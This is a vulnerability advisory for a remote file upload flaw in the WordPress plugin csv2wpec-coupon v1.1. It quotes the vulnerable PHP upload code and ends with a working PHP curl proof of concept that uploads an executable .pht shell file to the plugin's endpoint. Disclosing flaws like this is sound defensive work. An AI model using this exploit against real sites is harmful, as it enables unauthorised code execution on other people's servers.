Wordpress plugin csv2wpec-coupon v1.1 Remote file upload Vulnerability

2018.10.09
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: Remote file upload Vulnerability in Wordpress plugin csv2wpec-coupon v1.1 Author: Larry W. Cashdollar, @_larry0 Date: 2015-09-11 CVE-ID:[CVE-2015-1000013] Download Site: https://wordpress.org/plugins/csv2wpec-coupon Vendor: https://profiles.wordpress.org/esclarmonde/ Vendor Notified: 2015-09-12 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=153 Description: Csv2WPeC Coupon provides an easy way to import and export WP e-Commerce Coupon items from and to a CSV file. Vulnerability: The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for <?php as <? and a file extension of .pht. This allows a malicious user to upload executable files to a vulnerable wordpress installation. 37 if ( isset( $_FILES[$file_type] ) && !empty( $_FILES[$file_type] ) ) { 38 39 $file = $_FILES[$file_type]; 40 $file_error = $file['error']; 41 42 if ( $file_error === UPLOAD_ERR_OK ) { 43 44 $tmp_name = $file['tmp_name']; 45 46 $file_type = false; 47 if( function_exists( 'finfo_fopen' ) ) { 48 $finfo = finfo_open( FILEINFO_MIME ); 49 $file_type = finfo_file( $finfo, $tmp_name ); 50 finfo_close( $finfo ); 51 } 52 elseif( function_exists( 'mime_content_type' ) ) { 53 $file_type = mime_content_type( $tmp_name ); 54 } 55 elseif ( !is_dir( $tmp_name ) && ( $fn = @fopen( $tmp_name , "rb" ) ) ) { 56 $bin = fread( $fn, $maxlen = 3072 ); 57 fclose( $fn ); 58 if ( strpos( $bin, "<?php" ) !== false ) 59 $file_type = "application/x-httpd-php"; 60 } 61 65 66 if ( empty ( $file_type ) ) 67 $file_type = $file['type']; 68 69 $csv_mimetypes = array( 70 'text/csv', 71 'text/plain', 72 'application/csv', 73 'text/comma-separated-values', 74 'application/excel', 75 'application/vnd.ms-excel', 76 'application/vnd.msexcel', 77 'text/anytext', 78 'application/txt', 79 ); 80 81 if( in_array( $file_type, $csv_mimetypes ) ) { 82 83 if ( isset( $_POST['UPLOAD_DIR'] ) ) { 84 85 $wpsc_upload_dir = $_POST['UPLOAD_DIR']; 86 $dst_name = $file['name']; 87 $dest_file = $wpsc_upload_dir . $dst_name; 88 $dest_file = str_replace( '\\', '/', $dest_file ); // fix path 89 90 if ( move_uploaded_file( $tmp_name, $dest_file ) ) { 91 $_SESSION[$dataKey]['file_uploaded'] = $dest_file; 92 echo "success"; 93 } 94 Export: JSON TEXT XML Exploit Code: <?php echo "Running PoC against target site<br>"; $uploadfile="/var/www/s.pht"; $ch = curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult";

References:

http://www.vapidlabs.com/advisory.php?v=153


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top